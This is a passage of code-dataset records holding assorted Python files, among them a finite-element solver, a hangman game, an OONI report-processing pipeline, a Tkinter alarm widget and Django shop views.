orders)\n\n\n# ## Postprocessing and visualization\n\n# In[14]:\n\n\n# Establishing stable poles\ns = 2\nlambd_stab, phi_stab, orders_stab, ix_stab = koma.oma.find_stable_poles(lambd, phi, orders, s, stabcrit=stabcrit)\n\n\n# In[15]:\n\n\n#\nprint(lambd_stab)\n\n","sub_path":"examples/python/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"583023883","text":"import dynet as dy\n\nfrom xnmt.transducer import SeqTransducer, FinalTransducerState\nfrom xnmt.persistence import Serializable, serializable_init\nfrom xnmt.expression_sequence import ExpressionSequence\nfrom xnmt.param_collection import ParamManager\n\nclass FullyConnectedSeqTransducer(SeqTransducer, Serializable):\n  yaml_tag = '!FullyConnectedSeqTransducer'\n\n  @serializable_init\n  def __init__(self, in_height, out_height, nonlinearity='linear'):\n    \"\"\"\n    Args:\n      in_height: input dimension of the affine transform\n      out_height: output dimension of the affine transform\n      nonlinearity: nonlinear activation function\n    \"\"\"\n    model = ParamManager.my_params(self)\n    self.in_height = in_height\n    self.out_height = out_height\n    self.nonlinearity = nonlinearity\n\n    normalInit=dy.NormalInitializer(0, 0.1)\n    self.pW = model.add_parameters(dim = (self.out_height, self.in_height), init=normalInit)\n    self.pb = model.add_parameters(dim = self.out_height)\n\n  def get_final_states(self):\n    return self._final_states\n\n  def transduce(self, embed_sent):\n    src = embed_sent.as_tensor()\n\n    W = dy.parameter(self.pW)\n    b = dy.parameter(self.pb)\n\n    l1 = dy.affine_transform([b, W, src])\n    output = l1\n    if self.nonlinearity == 'linear':\n      output = l1\n    elif self.nonlinearity == 'sigmoid':\n      output = dy.logistic(l1)\n    elif self.nonlinearity == 'tanh':\n      output = 2*dy.logistic(l1) - 1\n    elif self.nonlinearity == 'relu':\n      output = dy.rectify(l1)\n    output_seq = ExpressionSequence(expr_tensor=output)\n    self._final_states = [FinalTransducerState(output_seq[-1])]\n    return 
output_seq\n\n","sub_path":"xnmt/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"234386309","text":"class ResolutionFilter(object):\n\t@staticmethod\n\tdef is_valid(obj_wall, obj_res, obj_ratio):\n\t\timg_res = obj_wall.get_resolution()\n\t\timg_ratio = obj_wall.get_ratio()\n\t\t\n\t\tfor res, ratio in zip(obj_res.get_resolutions(), obj_ratio.get_ratios()):\n\t\t\tif img_res[0] >= res[0] and img_res[1] >= res[1] and img_ratio == ratio:\n\t\t\t\treturn True\n\n\t\treturn False","sub_path":"ENTERPRISE/filters/ResolutionFilter.py","file_name":"ResolutionFilter.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"386755019","text":"import numpy as np\n\n# 1d FEM Solver for Time Dependent Diffusion Reaction Equation\n\n\ndef gquad_colloc(n):\n \"\"\"Function to return collocation position (zeta) and gaussian weights (w)\n\n Input:\n n -- number of collocation points\n Return:\n zeta -- n vector of collocation abscissa\n w -- n vector of gaussian weights at collocation points\n \"\"\"\n zeta = []\n w = []\n if n == 2:\n zeta = np.array([-0.577350269189626,\n 0.577350269189626])\n w = np.array([1,\n 1])\n elif n == 3:\n zeta = np.array([0,\n -0.7745966692414834,\n 0.7745966692414834])\n w = np.array([0.8888888888888888,\n 0.5555555555555556,\n 0.5555555555555556])\n elif n == 4:\n zeta = np.array([-0.3399810435848563,\n 0.3399810435848563,\n -0.8611363115940526,\n 0.8611363115940526])\n w = np.array([0.6521451548625461,\n 0.6521451548625461,\n 0.3478548451374538,\n 0.3478548451374538])\n elif n == 5:\n zeta = np.array([0,\n -0.5384693101056831,\n 0.5384693101056831,\n -0.9061798459386640,\n 0.9061798459386640])\n w = np.array([0.5688888888888889,\n 0.4786286704993665,\n 0.4786286704993665,\n 0.2369268850561891,\n 0.2369268850561891])\n else:\n print(\"Higher order not yet implemented.\")\n return zeta, w\n\n\ndef gquad(function, a, b, n=2):\n \"\"\"Function for n point gaussian quadrature\n\n Input:\n function -- function to be integrated\n a -- lower bound for integration\n b -- upper bound for integration\n n -- n-point gaussian quadrature. Default = 2\n Return:\n result -- integration value\n \"\"\"\n result = 0\n zeta, w = gquad_colloc(n)\n x = (b - a) / 2 * zeta + (b + a) / 2\n for (xc, wc) in zip(x, w):\n result += wc * function(xc)\n result *= (b - a) / 2\n return result\n\n\ndef fem_solver(v, elem, diff, tau, ic, b, bc, bc_type, dt, nt):\n \"\"\"Function for finite element method solver for diffusion reaction equation in project 7\n\n Input:\n v -- #v by 1 position of vertices (nodes)\n elem -- #elem by 2 position of elements. Contain vertex ids\n diff -- function for diffusivity\n tau -- function for reaction rate tau\n ic -- #v by 1 initial condition\n b -- #b by 1 id of boundary nodes\n bc -- #b by 1 value at corresponding boundary nodes\n bc_type -- #b by 1 boundary type. 
0 for Dirichlet condition, 1 for Neumann condition.\n dt -- time step size\n nt -- number of time steps\n\n Return:\n u -- nt by #v solution on nodes\n \"\"\"\n\n n_node = v.shape[0]\n n_elem = elem.shape[0]\n u = np.zeros([nt + 1, n_node])\n # construct element-wise K, M, Mt matrix\n # construct element-wise R vector\n k_e = np.zeros([n_elem, 2, 2])\n m_e = np.zeros([n_elem, 2, 2])\n mt_e = np.zeros([n_elem, 2, 2])\n for e in range(n_elem): # loop through elements\n x_elem = v[elem[e, :]]\n # stiffness and load\n k_e[e, :, :], m_e[e, :, :], mt_e[e, :, :] = construct_fem_matrix(diff, tau, dt, x_elem)\n # construct global matrix\n k_global = np.zeros([n_node, n_node])\n m_global = np.zeros([n_node, n_node])\n mt_global = np.zeros([n_node, n_node])\n r_global = np.zeros([n_node])\n for e in range(n_elem): # iterate through element\n for i in range(k_e.shape[1]):\n for j in range(k_e.shape[2]):\n k_global[elem[e, i], elem[e, j]] += k_e[e, i, j]\n m_global[elem[e, i], elem[e, j]] += m_e[e, i, j]\n mt_global[elem[e, i], elem[e, j]] += mt_e[e, i, j]\n if bc_type[0] == 1:\n r_global[b[0]] = bc[0]\n if bc_type[-1] == 1:\n r_global[b[-1]] = -bc[-1]\n MK = k_global + m_global\n MK[0, :] = np.zeros([MK.shape[1]])\n MK[0, 0] = 1\n MK_inv = np.linalg.inv(MK)\n # march in time and calculate profile\n u[0, :] = ic # set initial condition\n for it in range(1, nt+1):\n A = r_global+np.dot(mt_global, u[it-1, :])\n A[0] = bc[0]\n u[it, :] = np.dot(MK_inv,A)\n\n return u\n\n\ndef construct_fem_matrix(diff, tau, dt, x):\n n = 5 # Gaussian integration order\n k_ij, m_ij, mt_ij, r_i = np.zeros([2, 2]), np.zeros([2, 2]), np.zeros([2, 2]), np.zeros([2])\n x_zeta = lambda zeta: 0.5 * (x[0] + x[-1]) + zeta / 2 * (x[-1] - x[0])\n dzeta_dx = lambda zeta: 2 / (x[-1] - x[0])\n # k matrix\n kf_00 = lambda zeta: 1 / 4 * diff(x_zeta(zeta)) * dzeta_dx(zeta)\n k_ij[0, 0] = gquad(kf_00, -1, 1, n=n)\n k_ij[1, 1] = k_ij[0, 0]\n k_ij[1, 0] = -k_ij[0, 0]\n k_ij[0, 1] = -k_ij[0, 0]\n # m matrix\n mf_00 = lambda zeta: 1 / 4 * ((zeta - 1) ** 2) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n mf_01 = lambda zeta: -1 / 4 * (zeta ** 2 - 1) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n mf_11 = lambda zeta: 1 / 4 * ((zeta + 1) ** 2) * (tau(x_zeta(zeta)) + 1 / dt) / dzeta_dx(zeta)\n\n m_ij[0, 0] = gquad(mf_00, -1, 1, n=n)\n m_ij[1, 1] = gquad(mf_11, -1, 1, n=n)\n m_ij[1, 0] = gquad(mf_01, -1, 1, n=n)\n m_ij[0, 1] = gquad(mf_01, -1, 1, n=n)\n # mt matrix\n mtf_00 = lambda zeta: 1 / 4 * ((zeta - 1) ** 2) * (1 / dt) / dzeta_dx(zeta)\n mtf_01 = lambda zeta: -1 / 4 * (zeta ** 2 - 1) * (1 / dt) / dzeta_dx(zeta)\n mtf_11 = lambda zeta: 1 / 4 * ((zeta + 1) ** 2) * (1 / dt) / dzeta_dx(zeta)\n mt_ij[0, 0] = gquad(mtf_00, -1, 1, n=n)\n mt_ij[1, 1] = gquad(mtf_11, -1, 1, n=n)\n mt_ij[1, 0] = gquad(mtf_01, -1, 1, n=n)\n mt_ij[0, 1] = gquad(mtf_01, -1, 1, n=n)\n\n return k_ij, m_ij, mt_ij\n\n\ndef mesh_setup(x_0=0, L=1, n_elem=3, v=[], order=1):\n \"\"\"Function to setup the uniform mesh of a given order\n\n Input:\n n_elem -- #elem\n order -- #order of polynomial\n Return:\n v -- #v by 1 position of vertices (nodes)\n elem -- #elem by polyOrder+1 position of elements. 
Contain vertex ids in each element\n    \"\"\"\n    if len(v) == 0:  # handles both the empty-list default and an empty array\n        v = np.linspace(x_0, L, order * n_elem + 1)  # uniform nodes\n    else:\n        n_elem = v.shape[0] - 1\n    elem = np.zeros([n_elem, order + 1], dtype=int)  # connectivity\n    for col in range(order + 1):\n        elem[:, col] = np.arange(col, col + order * (n_elem - 1) + 1, order, dtype=int)\n    return v, elem\n","sub_path":"ME280/Homework/fem_dr.py","file_name":"fem_dr.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367549805","text":"import zmq\n\ncontext = zmq.Context()\nsocket = context.socket(zmq.DEALER)\nidentity = u'receiver'\nsocket.identity = identity.encode('utf-8')\nsocket.connect('ipc://router')\nprint('Client %s started' % (identity))\ntry:\n    while True:\n        msg = socket.recv()\n        print('Client received: %s' % msg)\nfinally:\n    # close the socket and terminate the context when the receive loop is interrupted\n    socket.close()\n    context.term()","sub_path":"reciever.py","file_name":"reciever.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596493814","text":"import random, os\n\ndef get_words(file_path):\n    with open(file_path) as file:\n        word_list = file.read().splitlines()\n    return word_list\n\ndef logger(msg=None):\n    # cross-platform terminal clear\n    os.system('cls' if os.name == 'nt' else 'clear')\n    if msg:\n        print(msg)\n\ndef print_word(word, char_left):\n    for char in word:\n        if char in char_left:\n            print('_', end=\" \")\n        else:\n            print('{} '.format(char), end=\" \")\n    print('')\n\ndef game_loop(word):\n    char_count = len(word)\n    char_left = list(set(word))\n    attempt = 5\n\n    logger('This word has {} letter(s)'.format(char_count))\n    while attempt != 0 and len(char_left) != 0:\n        print_word(word, char_left)\n        print('{} attempt(s) left'.format(attempt))\n        inp = input('guess character: ')\n        if inp not in char_left and inp not in word:\n            logger('Incorrect!!')\n            attempt -= 1\n        elif inp not in char_left and inp in word:\n            logger('You already got that one!!')\n        else:\n            logger('Correct!!')\n            char_left.remove(inp)\n\n    if len(char_left) == 0:\n        logger('Victory!! Of course, the word is {}'.format(word))\n    else:\n        logger('Lost!! The mysterious word is {}'.format(word))\n\ndef main():\n    word_list = get_words('programs/words.txt')\n\n    play = 'Y'\n    while play == 'Y':\n        word = random.choice(word_list)\n        game_loop(word)\n        play = input('Continue? (Y/n): ')\n        while play != 'Y' and play != 'n':\n            logger('Invalid answer!')\n            play = input('Continue? (Y/n): ')\n\nmain()\n","sub_path":"programs/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651689963","text":"\n\nfrom xai.brain.wordbase.nouns._frump import _FRUMP\n\n# class header\nclass _FRUMPS(_FRUMP):\n\tdef __init__(self):\n\t\t_FRUMP.__init__(self)\n\t\tself.name = \"FRUMPS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"frump\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_frumps.py","file_name":"_frumps.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"539595507","text":"import logging\nimport sys\n\ntry:\n    from yaml import CLoader as Loader\nexcept ImportError:\n    logging.critical(\"Failed to load CLoader for YAML. 
You should definitely install that before proceeding.\")\n    sys.exit(1)\n\nimport oonilyzer\nimport oonilyzer.models.s3\nimport oonilyzer.helpers.files\nimport oonilyzer.helpers.types\nimport oonilyzer.helpers.usability\n\nimport multiprocess as mp\nimport ujson as json\nimport pandas as pd\nimport boto3\nimport copy\nimport yaml\nimport os\nimport io\nimport gc\n\nboto3.set_stream_logger('boto3.resources', logging.WARNING)\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass Setup(object):\n\n    @staticmethod\n    def run():\n        for path in oonilyzer.local_targets.values():\n            os.makedirs(path, exist_ok=True)\n\n\nclass IdentifyRawReports(object):\n\n    @staticmethod\n    def run(start_date, end_date, **kwargs):\n        bucket = oonilyzer.models.s3.CachedBucket(name=oonilyzer.buckets['raw'])\n        dates = pd.date_range(start_date, end_date).strftime('%Y-%m-%d')\n        prefixes = map(lambda date: os.path.join(oonilyzer.s3_targets['raw'], date), dates)\n\n        return list(bucket.get_keys(prefixes))\n\n\nclass DownloadRawReports(object):\n    targets = None\n\n    @staticmethod\n    def run(**kwargs):\n        DownloadRawReports.targets = kwargs['ti'].xcom_pull(key=None, task_ids='identify')\n\n        targets = list(filter(lambda x: not os.path.exists(x.destination), DownloadRawReports.targets))\n        total_size = sum(map(lambda x: x.size, targets))\n\n        logging.info(\"Fetching %d targets (%s)\" % (len(targets), oonilyzer.helpers.usability.sizeof_fmt(total_size)))\n\n        manager = mp.Manager()\n        queue = manager.Queue()\n\n        for target in targets:\n            queue.put(target)\n\n        processes = []\n        for _ in range(mp.cpu_count()):\n            process = mp.Process(target=DownloadRawReports.get, args=[queue])\n            process.start()\n            processes.append(process)\n            queue.put(None)  # one sentinel per worker so every get() loop terminates\n\n        for process in processes:\n            process.join()\n\n        return list(map(lambda x: x.destination, DownloadRawReports.targets))\n\n    @staticmethod\n    def get(q):\n        pid = os.getpid()\n\n        bucket = oonilyzer.models.s3.CachedBucket(name=oonilyzer.buckets['raw'])\n        for target in iter(q.get, None):\n\n            file_size = oonilyzer.helpers.usability.sizeof_fmt(target.size)\n            logging.info(\"[%d] Downloading %s from %s\" % (pid, file_size, target.url))\n\n            data = DownloadRawReports.normalize(target=target, data=io.StringIO(bucket.get_key_as_string(target).decode('utf-8')))\n            if data:\n                oonilyzer.helpers.files.save(path=target.destination, data=data)\n                logging.info(\"[%d] Saved %s to %s\" % (pid, file_size, target.destination))\n\n            gc.collect()\n\n    @staticmethod\n    def normalize(target, data):\n        logging.info(\"[%d] Normalising %s\" % (os.getpid(), target.source))\n\n        if target.source.endswith(('.yaml', '.yml', '.yamloo')):\n            return list(yaml.load_all(data, Loader=Loader))\n\n        elif target.source.endswith('.json'):\n            lines = []\n            for line in data:\n                try:\n                    lines.append(json.loads(line))\n\n                except ValueError as E:  # ujson raises ValueError on malformed input\n                    logging.error(\"Encountered malformed JSON in %s: %s\" % (target.url, E))\n\n            return lines\n\n        else:\n            logging.warning(\"Expected file to be in YAML or JSON lines format, got: %s\" % target.source)\n            return None\n\n\nclass NormaliseRawReports(object):\n    targets = None\n\n    @staticmethod\n    def run(**kwargs):\n        NormaliseRawReports.targets = kwargs['ti'].xcom_pull(key=None, task_ids='download')\n\n        manager = mp.Manager()\n        queue = manager.Queue()\n\n        for target in NormaliseRawReports.targets:\n            queue.put(target)\n\n        processes = []\n        for _ in range(mp.cpu_count()):\n            process = 
mp.Process(target=NormaliseRawReports.worker, args=[queue])\n process.start()\n processes.append(process)\n queue.put(None)\n\n for process in processes:\n process.join()\n\n @staticmethod\n def worker(q):\n pid = os.getpid()\n for target in iter(q.get, None):\n try:\n print(\"[%d] is normalising %s\" % (pid, target))\n metrics = NormaliseRawReports.normalise(target=target, tests=oonilyzer.helpers.files.load(target))\n\n except (ValueError, EOFError) as E:\n logging.info(\"%s appears to be corrupt, removing it\" % target)\n os.remove(target)\n\n @staticmethod\n def normalise(target, tests):\n def deduplicate(metric):\n duplicates = set(metric.keys()).intersection(set(metric['test_keys'].keys()))\n for k in duplicates:\n if metric[k] == metric['test_keys'][k]:\n del metric['test_keys'][k]\n return metric\n\n def get_header():\n if isinstance(tests, list):\n for a in tests:\n for b in tests:\n if a.keys() != b.keys():\n return a\n return None\n\n header = get_header()\n if not header:\n return tests\n else:\n metrics = []\n for test in tests:\n if header == test:\n continue\n else:\n metric = copy.deepcopy(header)\n metric['test_keys'] = test\n\n missing_keys = oonilyzer.metric_schema - metric.keys()\n if missing_keys:\n flattened_metric = oonilyzer.helpers.types.flatten_dict(metric)\n relocatable_keys = list(\n filter(lambda x: x in flattened_metric.keys() and x not in metric, missing_keys)\n )\n for k in missing_keys:\n if k in relocatable_keys:\n metric[k] = flattened_metric[k]\n else:\n metric[k] = None\n\n metrics.append(deduplicate(metric))\n return metrics\n","sub_path":"oonilyzer/pipeline/phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570335716","text":"import tkinter as tk\r\nfrom set_alarm import *\r\nimport Pmw\r\nfrom datetime import datetime, timedelta\r\n\r\ndef time_difference(next_date, pm_am):\r\n current_date = datetime.today()\r\n hour = current_date.hour\r\n minute = current_date.minute\r\n second = current_date.second\r\n day = current_date.weekday()\r\n\r\n current_delta = timedelta(days=day, hours=hour, minutes=minute, seconds=second)\r\n diff_total_time = (next_date - current_delta)\r\n diff = diff_total_time.seconds\r\n if diff_total_time.days == -1:\r\n diff = diff_total_time.seconds\r\n else:\r\n diff = (abs(diff_total_time.days)*86400)+diff_total_time.seconds\r\n seconds = (diff%60)\r\n minutes = (diff//60) % 60\r\n\r\n hours = (diff//3600) % 24\r\n\r\n days = (diff//86400)%7\r\n return days, hours, minutes, seconds\r\n\r\nclass AlarmDetails(tk.Frame):\r\n hours = [str(num) for num in range(1, 13)]\r\n minutes = [str(num).rjust(2, '0') for num in range(0, 60)]\r\n format = ['AM', 'PM']\r\n days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',\r\n 'Saturday', 'Sunday']\r\n sounds = ['Xylophone', 'Chords', 'Times', 'Tap', 'Jingle']\r\n snooze_time = ['5 minutes', '10 minutes', '20 minutes', '30 minutes', '1 hour']\r\n def __init__(self, main, master=None, old_file={}, name='', **kw):\r\n super().__init__(main, **kw)\r\n self.master = master\r\n self.frame = None\r\n self.name = name\r\n text = 'EDIT ALARM' if old_file else 'NEW ALARM'\r\n self.new = True if old_file else False\r\n tk.Label(self, text=text, font=('arial', 11, 'bold')).pack(side=tk.TOP, anchor=tk.W)\r\n\r\n self.time = []\r\n frame = tk.Frame(self)\r\n self.approximate_time = tk.StringVar()\r\n for time in [self.hours, self.minutes, self.format]:\r\n s = 
SetAlarm(frame, time, start=len(time)//2, width=150, height=180, takefocus=1)\r\n self.time.append(s)\r\n s.pack(side=tk.LEFT)\r\n frame.pack(side=tk.TOP)\r\n tk.Label(self, textvar=self.approximate_time, fg=rgb(121, 121, 121)).pack(side=tk.TOP)\r\n\r\n #this holds the buttons such as save, delete and cancel\r\n frame2 = tk.Frame(self)\r\n tk.Button(frame2, text='Cancel', relief=tk.FLAT, font=('arial', 11),\r\n command=lambda s= self: self.master.cancel(s)).pack(side=tk.RIGHT,padx=(5))\r\n if old_file:\r\n tk.Button(frame2, text='Delete', relief=tk.FLAT, font=('arial', 11),\r\n command=lambda s= self: self.master.delete(s)).pack(side=tk.RIGHT,padx=(5))\r\n tk.Button(frame2, text='Save', command=lambda s= self: self.master.save_file(s), relief=tk.FLAT,\r\n font=('arial', 11)).pack(side=tk.RIGHT,padx=(5))\r\n frame2.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True, anchor=tk.S)\r\n\r\n scroll_bar = Pmw.ScrolledFrame(self,\r\n hull_width=400, hull_height=220)\r\n scroll_bar.pack(fill='both', expand=1)\r\n scroll_frame = scroll_bar.interior()\r\n scroll_frame.configure(takefocus=0)\r\n scroll_frame.bind('', lambda x: self.cancel_widget())\r\n tk.Label(scroll_frame, text='Alarm name', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.alarm_name = tk.StringVar()\r\n tk.Entry(scroll_frame, fg='blue', textvar=self.alarm_name, width=60, takefocus=1).pack(side=tk.TOP, anchor=tk.W, padx=(5))\r\n\r\n tk.Label(scroll_frame, text='Repeats', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.repeat_days = {day: tk.BooleanVar() for day in self.days}\r\n self.alarm_days_name = tk.StringVar()\r\n self.alarm_days_name.set('Only Once')\r\n self.alarm_days = tk.Button(scroll_frame, textvar=self.alarm_days_name, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_days)\r\n self.alarm_days.bind('', lambda x, s=self: s.show_days())\r\n self.alarm_days.pack(side=tk.TOP, anchor=tk.W)\r\n\r\n tk.Label(scroll_frame, text='Sound', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.alarm_tunes_name = tk.StringVar()\r\n self.alarm_tunes_name.set('Charms')\r\n self.alarm_tunes = tk.Button(scroll_frame, textvar=self.alarm_tunes_name, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_sounds)\r\n self.alarm_tunes.bind('', lambda x, s=self: s.show_sounds())\r\n self.alarm_tunes.pack(side=tk.TOP, anchor=tk.W)\r\n tk.Label(scroll_frame, text='Snooze time', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.snooze_option = tk.StringVar()\r\n self.snooze_option.set('30 minutes')\r\n self.snooze_button = tk.Button(scroll_frame, textvar=self.snooze_option, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_snooze_time)\r\n self.snooze_button.pack(side=tk.TOP, anchor=tk.W, padx=(5))\r\n self.snooze_button.bind('', lambda x, s=self: s.show_snooze_time())\r\n\r\n self.next_day = datetime.today().weekday()\r\n #when the user clicks on the mouse button (clicked on the main widget and not not mini widgets)\r\n #and a mini widget is currently being displayed,\r\n #that widget would be displayed\r\n self.bind('', lambda x: self.cancel_widget())\r\n if old_file:\r\n self.load_save_file(old_file)\r\n\r\n self.approximate_time_left()\r\n\r\n def load_save_file(self, save_file):\r\n #produces the time of the alarm going off\r\n time_data = save_file['alarm_time'].split(':')\r\n for time in range(len((time_data))):\r\n time_index = self.time[time]\r\n get = 
time_index.buttons.index(time_data[time])-1\r\n time_index.set_region(get, True)\r\n\r\n #get the alarm name\r\n self.alarm_name.set(save_file['alarm_name'])\r\n\r\n #get the repeated days\r\n for repeat_day in save_file['repeat_days']:\r\n self.repeat_days[repeat_day].set(True)\r\n self.get_ticked_days()\r\n\r\n #set the alarm tunes name\r\n self.alarm_tunes_name.set(save_file['alarm_tunes_name'])\r\n\r\n #set the snooze timer\r\n self.snooze_option.set(save_file['snooze_time'])\r\n\r\n def approximate_time_left(self):\r\n time = [time.clicked_on for time in self.time]\r\n if time[-1] == 'PM':\r\n hour = int(time[0])+12\r\n else:\r\n hour = int(time[0])\r\n min = int(time[1])\r\n cur_delta = timedelta(days=self.next_day, hours=hour, minutes=min)\r\n new_day, new_hour, new_min, new_sec = time_difference(cur_delta, time[-1])\r\n time_left = 'In '\r\n if new_day:\r\n time_left += '%d days, ' % new_day\r\n if new_hour:\r\n time_left += '%d hours, ' % new_hour\r\n if new_min:\r\n time_left += '%d minutes' % new_min\r\n if new_sec and sum([new_day, new_hour, new_min]) == 0:\r\n time_left += ' %d seconds' % new_sec\r\n\r\n self.approximate_time.set(time_left)\r\n self.after(60, self.approximate_time_left)\r\n\r\n def show_days(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self)\r\n for day in self.days:\r\n tk.Checkbutton(self.frame, text=day, takefocus=0, state=tk.NORMAL, anchor=tk.W, variable=self.repeat_days[day],\r\n bg=HOVER_BUTTON, height=2, width=40).pack(side=tk.TOP)\r\n self.frame.func = self.get_ticked_days\r\n self.frame.place(relx=0.02, rely=0.2)\r\n\r\n def show_sounds(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self, bg=HOVER_BUTTON)\r\n for ind, sound in enumerate(self.sounds):\r\n tk.Button(self.frame, text='play',takefocus=0, anchor=tk.W, relief=tk.FLAT,\r\n bg=HOVER_BUTTON, height=2).grid(row=ind, column=1)\r\n tk.Button(self.frame, text=sound,takefocus=0, anchor=tk.W, relief=tk.FLAT, command=lambda s=self,sou=sound:s.set_sound(sou),\r\n bg=HOVER_BUTTON, height=2, width=40).grid(row=ind, column=2)\r\n\r\n self.frame.place(relx=0.02, rely=0.41)\r\n\r\n def set_sound(self, sound):\r\n self.alarm_tunes_name.set(sound)\r\n self.cancel_widget()\r\n\r\n def show_snooze_time(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self)\r\n for snooze_time in self.snooze_time:\r\n tk.Button(self.frame, text=snooze_time, takefocus=0, anchor=tk.W, relief=tk.FLAT, bg=HOVER_BUTTON, height=2,\r\n width=40, command=lambda s=self,sou=snooze_time:s.set_snooze_time(sou)).pack(side=tk.TOP)\r\n self.frame.place(relx=0.02, rely=0.55)\r\n\r\n def set_snooze_time(self, sound):\r\n self.snooze_option.set(sound)\r\n self.cancel_widget()\r\n\r\n def get_ticked_days(self):\r\n repeat_days = []\r\n for day, value in self.repeat_days.items():\r\n if value.get():\r\n repeat_days.append(day[:3])\r\n if len(repeat_days) == len(self.repeat_days):\r\n self.alarm_days_name.set('Everyday')\r\n elif not len(repeat_days):\r\n self.alarm_days_name.set('Only Once')\r\n else:\r\n if 'Sat' in repeat_days and 'Sun' in repeat_days:\r\n repeat_days.remove('Sat')\r\n repeat_days.remove('Sun')\r\n repeat_days.insert(0, 'Weekends')\r\n self.alarm_days_name.set(', '.join(repeat_days))\r\n nearest_day = self.get_closest_day(repeat_days)\r\n self.next_day = nearest_day\r\n\r\n def get_closest_day(self, repeat_days):\r\n 'This gets the closest day to when the alarm is meant to repeat'\r\n today = datetime.today().weekday()\r\n if self.days[today][:3] in repeat_days:\r\n return today\r\n if 'Weekends' 
in repeat_days:\r\n repeat_days.remove('Weekends')\r\n repeat_days.append('Sat')\r\n repeat_days.append('Sun')\r\n nearest_day = (today+1)%len(self.days)\r\n\r\n while nearest_day != today:\r\n if self.days[nearest_day][:3] in repeat_days:\r\n if nearest_day >= today:\r\n return nearest_day\r\n else:\r\n return nearest_day+7\r\n nearest_day = (nearest_day+1) % len(self.days)\r\n return today\r\n\r\n def cancel_widget(self):\r\n if self.frame:\r\n self.frame.destroy()\r\n try:\r\n self.frame.func()\r\n except AttributeError:\r\n pass\r\n self.frame = None\r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n AlarmDetails(root, width=462, height=563).pack()\r\n root.mainloop()\r\n","sub_path":"alarm_details.py","file_name":"alarm_details.py","file_ext":"py","file_size_in_byte":10801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284942835","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom pandas.io.json import json_normalize\n\nwith open('testinput/flight_failure/flight_failed.json') as f:\n data_1 = json.load(f)\n\ndata_df1 = json_normalize(data_1['flights'])\nprint(data_df1.shape)\n\ndata_df1.drop(data_df1.select_dtypes(['object']), inplace=True, axis=1)\nprint(\"dropped string fields\")\nprint(data_df1.shape)\n\ndf_all = data_df1[np.isfinite(data_df1['highest_failure_level.id'])]\ndf_all.dropna(axis=1, how='all', inplace=True)\n\nprint(\"dropped string fields\")\nprint(df_all.shape)\n\ndf_all.fillna(0, inplace=True)\ndf_all.to_csv('testinput/flights_failed.csv', encoding='utf-8', index=False)\n","sub_path":"Abhishek_arm_test/src/clean_test_data.py","file_name":"clean_test_data.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"348919554","text":"from re import M\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom axf.models import Wheel, Nav, Mustbuy, Commodity, Mainshow, Foottypes, Goods\n\n\ndef home(request):\n wheels = Wheel.objects.all()\n navs = Nav.objects.all()\n mustbuys = Mustbuy.objects.all()\n\n commoditys = Commodity.objects.all()\n commodity0 = commoditys[0]\n commodity1s = commoditys[1:3]\n commodity2s = commoditys[3:7]\n commodity3s = commoditys[7:11]\n\n mainshows = Mainshow.objects.all()\n request_dir = {\n 'wheels':wheels,\n 'navs':navs,\n 'mustbuys':mustbuys,\n 'commodity0':commodity0,\n 'commodity1s': commodity1s,\n 'commodity2s': commodity2s,\n 'commodity3s': commodity3s,\n 'mainshows':mainshows\n }\n return render(request, 'home/home.html',request_dir)\n\n\ndef market(request, childid='0', sortid='0'):\n foodtypes = Foottypes.objects.all()\n\n index = int(request.COOKIES.get('index', '0'))\n\n categoryid = foodtypes[index].typeid\n\n if childid == '0':\n goods = Goods.objects.filter(categoryid=categoryid)\n else:\n goods = Goods.objects.filter(categoryid=categoryid).filter(childcid=childid)\n\n if sortid == '1':\n goods = goods.order_by('-productnum')\n elif sortid == '2':\n goods = goods.order_by('price')\n elif sortid == '3':\n goods = goods.order_by('-price')\n\n\n childtypenames = foodtypes[index].childtypenames\n 